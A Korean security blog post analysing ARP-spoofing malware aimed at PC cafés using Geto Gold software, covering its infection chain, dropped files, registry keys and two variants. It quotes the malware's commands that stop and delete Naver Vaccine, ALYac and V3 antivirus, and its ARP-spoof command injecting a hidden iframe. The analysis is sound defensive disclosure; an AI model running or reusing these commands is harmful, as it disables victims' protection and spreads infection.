본문 바로가기
IT 보안소식

특정 프로그램이 설치 된 PC방을 타겟으로 발생 된 ARP Spoofing 악성코드

by 잡다한 처리 2011. 2. 17.
반응형

게토골드(Geto Gold)PC방 관리 프로그램을 사용하는 PC방을 타겟으로 한 ARP Spoofing 악성코드가 발견되었다.

아직도 최초 유포경로가 확인은 되지 않았지만, 게토골드를 사용하는 PC방에만 이런 경우가 나타난다고 하니 먼가 연관성이 있지 않을까 하는 의심만 하고 있다.

이에 게토골드에서는 공지사항을 내걸었다.
-게토골드 홈페이지 : http://www.getogold.co.kr/



해당 악성코드의 특징은 감염 PC를 유포서버로 이용한다는 점이다.

무슨말인즉, 보통 악성코드는 이미 만들어진 서버에 올려 놓은 파일을 다운로드하여 이용하는 것이 보편적인 방법이지만,
이번 악성파일은 감염되는 PC마다 어디에서든 파일을 다운로드 가능하도록 자체서버를 구축한다는 점이다.


지난 2월 6일 최초로 해당 파일이 발견되었으며, 유포방법과 생성파일에 대해서 알아보도록 하자.

1. 유포 방식
PC방 PC를 조사한 결과 ARP Spoofing으로 인하여 네트워크 트래픽과 iframe이 삽입되는 것이 확인되었다.


iframe 내용을 잘 살표보면 "H1A1.html" 로 연결시키는 것을 알 수 있다.
H1A1.html 내용을 살펴보면 특정 게임사의 ActiveX를 이용하여 윈도우 공유폴더에 있는 "sys.rna" 를 실행시킨다.


그럼 또 sys.rna 파일을 보자.
이번엔 서버(감염 된 PC)에서 H1A1.exe 와 H1A1-DNA.dna 파일을 다운로드 하여 실행한다.

또 한번 H1A1-DNA.dna 를 불러와서 최종적으로 프로그램 설치 파일인 FLY09_DNA.exe 를 실행한다.

위의 내용이 이번 ARP Spoofing의 핵심로직이다.
이 모든 내용은 최종 프로그램 설치 파일인 FLY09_DNA.exe(파일명은 수시로 바뀔 수 있다)이 실행되면 모두 설치된다.

2. 생성 파일 및 레지스트리 
- 생성 파일(악의적인 파일은 빨간색으로 표기함)
C:\WINDOWS\system32\wbem\AdmDll.dll
C:\WINDOWS\system32\wbem\dllhost.exe
C:\WINDOWS\system32\wbem\exeList.txt
C:\WINDOWS\system32\wbem\FLY09_DNA.exe
C:\WINDOWS\system32\wbem\H1A1-DNA.dna
C:\WINDOWS\system32\wbem\H1A1.exe
C:\WINDOWS\system32\wbem\H1A1.html
C:\WINDOWS\system32\wbem\install.reg
C:\WINDOWS\system32\wbem\mongoose.exe (웹 서버 구동 파일)
C:\WINDOWS\system32\wbem\mongoose.conf (웹 서버 환경설정 파일)
C:\WINDOWS\system32\wbem\PCBangMng.exe
C:\WINDOWS\system32\wbem\raddrv.dll
C:\WINDOWS\system32\wbem\sys.rna
C:\WINDOWS\system32\wbem\TIMEDNA.dna
C:\WINDOWS\system32\wbem\translator.dll
C:\WINDOWS\system32\wbem\UpdateService.exe
C:\WINDOWS\system32\wbem\wph.rna

- 생성 레지스트리
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Mongoose (유포 서버를 구동시키기 위한 서비스)
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\r_server (원격접속을 하기 위한 서비스)

3. 악성 행위
- 국내 보안 프로그램 프로세스, 서비스 종료 및 파일 삭제
sc stop nsvmon
sc stop Nsavsvc
nsvmon.npc
Nsavsvc.npc
C:\Windows\Temp\TaskKill.exe /F /IM NVC.npc
C:\Windows\Temp\TaskKill.exe /F /IM NVCAgent.npc
C:\Windows\Temp\TaskKill.exe /F /IM NaverAgent.exe
regsvr32 /u /s  "C:\Program Files\Naver\NaverVaccine\NVCShell.dll"
Cmd.exe /c del /Q /F "C:\Program Files\Naver\Security\*.*"
Cmd.exe /c del /Q /F "C:\Program Files\Naver\NaverAgent\*.*"
Cmd.exe /c del /Q /F "C:\Program Files\Naver\NaverVaccine\*.*"
C:\Program Files\Naver\NaverVaccine\NVC.npc
C:\Program Files\Naver\NaverVaccine\Nsavsvc.npc

AYAgent.aye
AYServiceNT.aye
C:\Windows\Temp\TaskKill.exe /F /IM AYAgent.aye
C:\Windows\Temp\TaskKill.exe /F /IM AYServiceNT.aye
C:\Windows\Temp\TaskKill.exe
Cmd.exe /c del /F /Q "C:\Program Files\ESTsoft\ALYac\*.*"
C:\Program Files\ESTsoft\ALYac\AYAgent.aye
C:\Program Files\ESTsoft\ALYac\AYServiceNT.aye

V3LRun
V3LTray.exe
V3Light.exe
V3LSvc.exe
Cmd.exe /c del /F /Q "C:\Program Files\AhnLab\V3Lite\*.*"
C:\Windows\Temp\TaskKill.exe /F /IM V3LRun.exe
C:\Windows\Temp\TaskKill.exe /F /IM V3LTray.exe
C:\Windows\Temp\TaskKill.exe /F /IM V3LSvc.exe
C:\Windows\Temp\TaskKill.exe /F /IM V3Light.exe
rundll32.exe "C:\Program Files\AhnLab\V3Lite\V3LCtrl.dll",V3LCtrl_StopService
C:\Windows\System32\Rundll32.exe
C:\Program Files\AhnLab\V3Lite\V3LRun.exe
C:\Program Files\AhnLab\V3Lite\V3LTray.exe
C:\Program Files\AhnLab\V3Lite\V3LSvc.exe
C:\Program Files\AhnLab\V3Lite\V3Light.exe


- 방화벽 차단 예외 설정
TCP 80,  137, 138, 139, 445 포트를 허용하며, 
C:\WINDOWS\system32\wbem\dllhost.exe 파일에 대해 허용한다.


- 웹서버 구동
mongoose 라는 웹서버 프로그램을 이용하여 감염 PC는 바로 유포서버로 이용된다.
mongoose 프로그램은 오픈소스로 "http://code.google.com/p/mongoose" 에서 쉽게 다운로드가 가능한 웹서버 프로그램이다.


- 공유폴더 생성
C:\Windows\Temp 폴더를 강제로 공유폴더로 지정한다.


- 원격 제어
감염 된 PC의 사용자는 자신도 모르게 악성파일 제작자에게 PC를 원격제어 당할 수 있다.
아래의 화면은 감염 된 PC를 원격으로 보고 있는 화면이다. 무섭다^^;


금일 2월 16일 오후5시 경에 2차 변종 유포가 발생되었다.
유포방식은 1차와 마찬가지로 mongoose 프로그램을 이용한 자체 유포서버 형태이다.

악성 행위도 거의 흡사하기 때문에 생성 된 파일과 간단하게 행위만 적어본다.

- ARP Spoofing 공격
C:\Windows\System32\Wbem\CKKeyCrypt.exe -idx 0 -interval 1000 -ip 10.0.2.1-10.0.2.254 -port 80 -spoofmode 1 -insert "<IFRAME ID='CKKeyPro' SRC='http://10.0.2.15:4096/CKKeyPro.html' WIDTH=0 HEIGHT=0></IFRAME><SCRIPT LANGUAGE='JAVASCRIPT'>try{a=document.getElementById('CKKeyPro');if(a != null && a != 'undefined')document.body.removeChild(a);}catch(e){}</SCRIPT>"


- 생성 파일(악의적인 파일은 빨간색으로 표기함)
C:\WINDOWS\system32\wbem\AdmDll.dll
C:\WINDOWS\system32\wbem\ARPProtector.exe
C:\WINDOWS\system32\wbem\CKAgent.exe
C:\WINDOWS\system32\wbem\CKKeyCrypt.exe
C:\WINDOWS\system32\wbem\CKKeyPro.dat
C:\WINDOWS\system32\wbem\CKKeyPro.exe (웹 서버 구동 파일)
C:\WINDOWS\system32\wbem\CKKeyPro.html
C:\WINDOWS\system32\wbem\ClientSM.exe
C:\WINDOWS\system32\wbem\dllhost.exe
C:\WINDOWS\system32\wbem\exeList.txt
C:\WINDOWS\system32\wbem\H1A1-DNA.dna
C:\WINDOWS\system32\wbem\install.reg
C:\WINDOWS\system32\wbem\javax.exe
C:\WINDOWS\system32\wbem\mongoose.conf (웹 서버 환경설정 파일)
C:\WINDOWS\system32\wbem\raddrv.dll
C:\WINDOWS\system32\wbem\TIMEDNA.dna
C:\WINDOWS\system32\wbem\transistor.dll
C:\WINDOWS\system32\wbem\w00w00w_root.exe
C:\WINDOWS\system32\wbem\XecureWeb.exe

2차의 특징은 국내 키보드 보안 업체의 아이콘을 도용하여 사용자의 눈을 속였다는 점이다.
개인적으로 나도 처음엔 긴마민가했다 ㅡ.ㅡ;; 코드를 보기 전에는!!
또한 1차 때 사용 했던 mongoose 프로그램의 파일이름과 아이콘도 바뀌었다.


누가 이 파일을 악성으로 보겠는가...;;
이건 정상파일과 너무나 흡사하다!!


- 방화벽 차단 예외 설정
TCP 80,  137, 138, 139, 445 포트를 허용하며, 
C:\WINDOWS\system32\wbem\dllhost.exe 파일에 대해 허용한다.
컴퓨터를 잘 모르는 사용자가 보면 그냥 지나칠 수 있는 부분이다.


이렇게 간단하게 1차 유포와 2차 유포의 대한 비교점과 분석을 해보았다.
쓰면서 느낀점이지만 정말 이거 퍼트린놈!! 잡히기만 해봐라!! 나쁜놈의 스끼!!
현재의 정황상 분명 우리나라 사람이 맞는거 같은데~ 아이콘까지 배낀걸 보면 어느정도 개발에 능숙한 사람이 아닐까 싶다.

현재 알약으로 치료가 가능하니, 최신으로 업데이트를 하고 실시간검사를 항상 켜두는 습관을 갖도록 하자.




댓글